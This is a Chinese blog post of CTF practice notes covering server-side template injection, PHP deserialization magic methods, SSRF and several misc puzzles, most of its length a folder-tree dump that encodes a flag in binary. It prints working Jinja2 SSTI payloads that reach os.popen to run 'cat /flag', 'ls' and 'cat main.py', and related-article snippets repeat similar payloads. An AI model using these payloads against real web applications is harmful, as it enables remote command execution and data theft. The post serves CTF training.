SSTI了解+反序列化了解+SSRF了解+之前的一些题

最新推荐文章于 2023-05-11 23:23:48 发布
最新推荐文章于 2023-05-11 23:23:48 发布
阅读量723 收藏 4
点赞数 3
分类专栏: 刷题记录 文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61109509/article/details/123291803
版权

文章目录

SSTI简介

SSTI,即服务端模板注入,起因是服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,从而导致各种各样的问题,与sql注入类似

web361

名字就是考点

?name={{x.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}}

web362

与前一题一样

?name={{x.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}}

SSTI 命令执行的一些总结

SSTI 命令执行的一些总结
ctf中的一些绕过tips
SSTI模板注入绕过(进阶篇)
探测目录

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()") }}{% endif %}{% endfor %}

一个个捕获

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat main.py').read()") }}{% endif %}{% endfor %}

反序列化:

php反序列化总结

  • serialize 将对象格式化成有序的字符串
  • unserialize 将字符串还原成原来的对象
  • 反序列化中常见的魔术方法
__wakeup() //执行unserialize()时,先会调用这个函数
__sleep() //执行serialize()时,先会调用这个函数
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__toString() //把类当作字符串使用时触发
__invoke() //当尝试将对象调用为函数时触发

SSRF

SSRF漏洞原理解析

[vnctf2022]Strange flag

将http全部保存下来,在最后一个包发现这个

`-- New\ folder
    |-- New\ folder
    |   |-- New\ folder
    |   |-- New\ folder\ (2)
    |   |-- New\ folder\ (3)
    |   `-- New\ folder\ (4)
    `-- New\ folder\ (2)
        |-- New\ Folder\ (3)
        |   |-- New\ folder
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |   `-- New\ folder
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   |       `-- New\ folder
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(3)
        |   |       |   `-- New\ folder
        |   |       `-- New\ folder(4)
        |   |-- New\ folder(10)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   |       `-- New\ folder
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |-- New\ folder(3)
        |   |       `-- New\ folder(4)
        |   |           `-- New\ folder
        |   |-- New\ folder(11)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   |       `-- New\ folder
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |-- New\ folder(3)
        |   |       `-- New\ folder(4)
        |   |-- New\ folder(12)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   |       `-- New\ folder
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |-- New\ folder(3)
        |   |       |   `-- New\ folder
        |   |       `-- New\ folder(4)
        |   |           `-- New\ folder
        |   |-- New\ folder(13)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   |       `-- New\ folder
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |-- New\ folder(3)
        |   |       `-- New\ folder(4)
        |   |-- New\ folder(14)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   |       `-- New\ folder
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(3)
        |   |       |   `-- New\ folder
        |   |       `-- New\ folder(4)
        |   |           `-- New\ folder
        |   |-- New\ folder(15)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   |       `-- New\ folder
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |-- New\ folder(3)
        |   |       `-- New\ folder(4)
        |   |           `-- New\ folder
        |   |-- New\ folder(16)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |   `-- New\ folder
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(3)
        |   |       `-- New\ folder(4)
        |   |-- New\ folder(17)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |   `-- New\ folder
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(3)
        |   |       |   `-- New\ folder
        |   |       `-- New\ folder(4)
        |   |-- New\ folder(18)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   |       `-- New\ folder
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(3)
        |   |       `-- New\ folder(4)
        |   |           `-- New\ folder
        |   |-- New\ folder(19)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   |       `-- New\ folder
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(3)
        |   |       |   `-- New\ folder
        |   |       `-- New\ folder(4)
        |   |           `-- New\ folder
        |   |-- New\ folder(2)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |   `-- New\ folder
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(3)
        |   |       |   `-- New\ folder
        |   |       `-- New\ folder(4)
        |   |-- New\ folder(20)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   |       `-- New\ folder
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(3)
        |   |       `-- New\ folder(4)
        |   |           `-- New\ folder
        |   |-- New\ folder(21)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   |       `-- New\ folder
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |-- New\ folder(3)
        |   |       `-- New\ folder(4)
        |   |-- New\ folder(22)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   |       `-- New\ folder
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |-- New\ folder(3)
        |   |       |   `-- New\ folder
        |   |       `-- New\ folder(4)
        |   |           `-- New\ folder
        |   |-- New\ folder(23)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   |       `-- New\ folder
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |-- New\ folder(3)
        |   |       `-- New\ folder(4)
        |   |-- New\ folder(24)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   |       `-- New\ folder
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(3)
        |   |       |   `-- New\ folder
        |   |       `-- New\ folder(4)
        |   |           `-- New\ folder
        |   |-- New\ folder(25)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   |       `-- New\ folder
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |-- New\ folder(3)
        |   |       `-- New\ folder(4)
        |   |           `-- New\ folder
        |   |-- New\ folder(26)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |   `-- New\ folder
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |-- New\ folder(3)
        |   |       |   `-- New\ folder
        |   |       `-- New\ folder(4)
        |   |-- New\ folder(27)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |   `-- New\ folder
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |-- New\ folder(3)
        |   |       |   `-- New\ folder
        |   |       `-- New\ folder(4)
        |   |           `-- New\ folder
        |   |-- New\ folder(28)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |   `-- New\ folder
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(3)
        |   |       `-- New\ folder(4)
        |   |-- New\ folder(29)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |   `-- New\ folder
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(3)
        |   |       |   `-- New\ folder
        |   |       `-- New\ folder(4)
        |   |-- New\ folder(3)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |   `-- New\ folder
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |-- New\ folder(3)
        |   |       |   `-- New\ folder
        |   |       `-- New\ folder(4)
        |   |           `-- New\ folder
        |   |-- New\ folder(30)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   |       `-- New\ folder
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |-- New\ folder(3)
        |   |       `-- New\ folder(4)
        |   |           `-- New\ folder
        |   |-- New\ folder(31)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |   `-- New\ folder
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(3)
        |   |       `-- New\ folder(4)
        |   |           `-- New\ folder
        |   |-- New\ folder(32)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |   `-- New\ folder
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(3)
        |   |       |   `-- New\ folder
        |   |       `-- New\ folder(4)
        |   |-- New\ folder(33)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |   `-- New\ folder
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |-- New\ folder(3)
        |   |       |   `-- New\ folder
        |   |       `-- New\ folder(4)
        |   |           `-- New\ folder
        |   |-- New\ folder(34)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   |       `-- New\ folder
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |-- New\ folder(3)
        |   |       `-- New\ folder(4)
        |   |           `-- New\ folder
        |   |-- New\ folder(35)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   |       `-- New\ folder
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(3)
        |   |       `-- New\ folder(4)
        |   |-- New\ folder(36)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   |       `-- New\ folder
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |-- New\ folder(3)
        |   |       `-- New\ folder(4)
        |   |           `-- New\ folder
        |   |-- New\ folder(37)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |   `-- New\ folder
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(3)
        |   |       |   `-- New\ folder
        |   |       `-- New\ folder(4)
        |   |-- New\ folder(38)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |   `-- New\ folder
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(3)
        |   |       `-- New\ folder(4)
        |   |           `-- New\ folder
        |   |-- New\ folder(39)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |   `-- New\ folder
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   |       `-- New\ folder
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(3)
        |   |       `-- New\ folder(4)
        |   |           `-- New\ folder
        |   |-- New\ folder(4)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |   `-- New\ folder
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   |       `-- New\ folder
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(3)
        |   |       `-- New\ folder(4)
        |   |-- New\ folder(5)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |   `-- New\ folder
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(3)
        |   |       |   `-- New\ folder
        |   |       `-- New\ folder(4)
        |   |-- New\ folder(6)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |   `-- New\ folder
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   |       `-- New\ folder
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |-- New\ folder(3)
        |   |       |   `-- New\ folder
        |   |       `-- New\ folder(4)
        |   |           `-- New\ folder
        |   |-- New\ folder(7)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |   `-- New\ folder
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |   `-- New\ folder
        |   |       |-- New\ folder(3)
        |   |       `-- New\ folder(4)
        |   |-- New\ folder(8)
        |   |   |-- New\ folder
        |   |   |   |-- New\ folder
        |   |   |   |-- New\ folder(2)
        |   |   |   |-- New\ folder(3)
        |   |   |   |   `-- New\ folder
        |   |   |   `-- New\ folder(4)
        |   |   |       `-- New\ folder
        |   |   `-- New\ folder(2)
        |   |       |-- New\ folder
        |   |       |-- New\ folder(2)
        |   |       |-- New\ folder(3)
        |   |       |   `-- New\ folder
        |   |       `-- New\ folder(4)
        |   `-- New\ folder(9)
        |       |-- New\ folder
        |       |   |-- New\ folder
        |       |   |-- New\ folder(2)
        |       |   |-- New\ folder(3)
        |       |   |   `-- New\ folder
        |       |   `-- New\ folder(4)
        |       |       `-- New\ folder
        |       `-- New\ folder(2)
        |           |-- New\ folder
        |           |-- New\ folder(2)
        |           |-- New\ folder(3)
        |           |   `-- New\ folder
        |           `-- New\ folder(4)
        |               `-- New\ folder
        |-- New\ folder
        |   |-- New\ folder
        |   |-- New\ folder\ (2)
        |   |-- New\ folder\ (3)
        |   |-- New\ folder\ (4)
        |   `-- New\ folder\ (5)
        `-- New\ folder\ (2)
            |-- New\ folder
            `-- New\ folder\ (2)

可以看到,第8行-第572行后面都是四个四个,排列比较整齐。那我们假设有子文件的为1,没子文件的为0。最后二进制转字符

simple_js

在这里插入图片描述

源码里有一串编码

转十六进制解不出来,那就试试url编码,将\x转换成%
​​在这里插入图片描述

在转为ascii编码,得到flag

[buuctf]MISC

被劫持的神秘礼物
导出http,翻看文件

在这里插入图片描述

MD532位小写加密一下得到flag

pipasound
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
8-14刷(php序列,Smarty ssti,json命令执行)
Realiy的博客
08-14 943
[NPUCTF2020]ReadlezPHP 找到time.php?source,打开的得到time.php的源码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } publ
Garud:自动工具可以扫描子域,子域接管,然后过滤掉XSS,SSTISSRF和更多注入点参数,并自动扫描一些低悬空漏洞
03-21
加鲁德 一种自动工具,可以扫描子域,子域接管,然后过滤出xss,sstissrf和更多注入点参数。 要求: Go语言,Python 2.7或Python 3。 系统要求:建议在具有1VCPU和2GB内存的vps上运行。 使用的工具-您必须安装这些工具才能使用此脚本 安装-安装工具之前,请先确保您是root用户 git clone https://github.com/R0X4R/Garud.git && cd Garud/ && chmod +x garud install.sh && mv garud /usr/bin/ && ./install.sh 用法 █▀▀ ▄▀█ █▀█ █░█ █▀▄ █▄█ █▀█ █▀▄ █▄█ █▄▀ coded by R0X4R with <3 Usage : -d target you want to scan (target. c
buu(ssti模板注入、ssrf服务器请求伪造)
qq_62046696的博客
08-19 770
搜索一下,shtml的信息,补充一下什么是ssi注入,SSI 注入全称Server-Side Includes Injection(服务端包含注入),ssi可以赋予html静态页面的动态效果,通过ssi执行命令,返回对应的结果,当在网站目录中发现了.stm .shtm .shtml或在界面中发现了。到这分析结束,我们只要绕过checkSign,让返回的值相同就可以了,可是secret这个密钥我们不知道值呀,仔细看第一个目录就可以明白。打开界面源码,什么都没有发现,试一下万能密码之类的登录,只返回fail。.
python ssti正确利用方式
qq_49973474的博客
05-11 550
很好 很有精神
模板注入SSTi笔记
jie_a的博客
04-14 319
模板注入SSTijinja2Smarty模板 jinja2 命令执行 {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('在这里输命令').read()") }}{% endif %}{% endfor %} 文件读写 {% for c
SSTI入门详解
E1even的博客
03-15 5036
关于基于flask的SSTI漏洞的阶段学习小结: SSTI的理解: SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。 SSTI引发的真正原因: render_template渲染函数的问 render_template渲染函数是什么: 就是把HTML涉及的页面与用户数据分离开,这样方便展示和管理。当用户输入自己的数据信息,HTML页面可以根据用户自身的信息来展示页面,因此才有了这个函数的使用。 ...
全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip
08-20
全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web...
Jinja2 模板注入&模板内命令执行
3569
03-13 2170
原因:        ichunqiu 的web中有一个 Musee de X ,知道 http:// 文件能获取,但是没有想到 file:// 获取文件,根据报错也没有想过他用的是 jinja2。后来朋友说payload每个环境可能不太一样,就自己尝试了一波。分析:      这是 python2 运行的,结果就是输出 whoami 的信息#code:utf-8 from jinja2 imp...
SSTI学习记录
cjdgg的博客
05-03 1539
SSTI学习记录环境语法变量过滤器 环境 from flask import Flask from flask import render_template from flask import request from flask import render_template_string app = Flask(__name__) @app.route('/test/') def test(): code = request.args.get('id') template = '''
flask ssti漏洞(补充)
weixin_53146913的博客
05-12 450
漏洞利用 前几篇文章分析了ssti漏洞的成因,以及一些常用过得payload 获取eval函数执行任意代码测试 Vulhub上的ssti文档是直接给了个获取eval函数并执行任意python代码的POC {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% i
python沙盒逃逸
Lethe's Blog
08-13 2174
0x01 简单介绍 python沙盒逃逸就是通过绕过种种过滤和限制,拿到本不应获取的一些“危险函数",或者绕过Python终端达到命令执行的效果。 0x02 常用备忘录 (1)func_globals 用法:function.func_globals 作用:返回包含函数全局变量的字典的引用——定义函数的模块的全局命名空间。 >>> def test():pass ... &gt...
班长出 -- funpy (带源码):python序列 + ssti + SSRF + remote_addr路由绕过 + url中的#定位符
Zero_Adam的博客
03-11 1638
目录:第五:一、自己做:二、不足&&学到的:三、学习WP:思路学习:1.绕过get_domain()2.绕过remote_addr() + \#3. 关于序列关于python序列方法一:exec的方法,(纯属为了复习opcode)方法二、一定有方法二的方法三:用这个变量覆盖的方法(后面的用的是这个方法):4. 接着做 python序列 + ssti 第五: 一、自己做: 做了个der,,, 审计代码差远了, 二、不足&&学到的: 学习了python的序列
深入理解Python中的__builtin__和__builtins__
weixin_33727510的博客
04-17 956
0.说明        这里的说明主要是以Python 2.7为例,因为在Python 3+中,__builtin__模块被命名为builtins,下面主要是探讨Python 2.x中__builtin__模块和__builtins__模块的区别和联系。1.名称空间(Namespace)        首先不得不说名称空间,因为名称空间是Python中非常重要的一个概念,所谓名称空间,其实指的是名...
模板注入(SSTI)攻击(jinja2)
热门推荐
钞sir的博客
10-04 2万+
和常见Web注入(SQL注入等)的成因一样,也是服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,因而可能导致了敏感信息泄露、代码执行、GetShell 等问。其影响范围主要取决于模版引擎的复杂性。(web安全中的真理:永远不要相信用户的输入) 以一道CTF为例,简单演示一下注入的流程及一些被过滤了的命令的构造方法; 首先打...
i春秋 2020新春战“疫”大赛(web部分)
qq_42812036的博客
02-25 789
ezupload 上传一句话,蚁剑直连,bash直接cat /flag,说没权限折腾了下Linux提权,大马提权。 payload: cd / cat /readflag : ( 简单的招聘系统 payload admin' or 1# 进入admin,成功访问招聘界面blank page界面 key处存在sql注入 有5个字段,显位在2 可以猜测后端查询语句可能类似: selec...
Simple_SSTI_1
qdlws的博客
07-22 2000
Simple_SSTI_1
PYthon继承链(egg)的思考和实战
蚁景网安学院
05-25 424
PYthon继承链(egg)的思考与实战前言起初学习ssti的时候,就只是拿着tplmap一顿乱扫,然后进行命令执行,之前深入学习了一下PYthon继承链;今天写个文章进行加深记忆...
CTF_Web:从0学习Flask模板注入(SSTI
AFCC_的博客(Web_Dog)
08-30 3549
0x01 前言 最近在刷的过程中发现服务端模板注入的目也比较常见,这类注入目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个记录。 0x02 Flask简介 Flask是一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工作都在框架中被实现了。他与Django不同于Django是一个全能型框架,通常用于编写大型的网站。
SSTI漏洞初手入门
kracer的博客
01-08 956
0x01 什么是SSTI SSTI,即服务器端模板注入(Server-Side Template Injection)。攻击者在服务器输入语句,服务端将其作为Web应用模板内容的一部分,在进行目标编译渲染的过程中,进行了语句的拼接,执行了所插入的恶意内容,从而导致信息泄露、代码执行、GetShell等问。 补充: 1)模板引擎是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的文档,就是将模板文件和数据通过...
flask ssti
最新发布
09-26
Flask SSTI(Server-Side Template Injection)是指在Flask应用中,由于未正确处理用户输入,导致用户输入的模板言被当作代码执行的漏洞。攻击者可以通过向模板注入恶意代码来执行任意命令或获取敏感信息。要防止...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
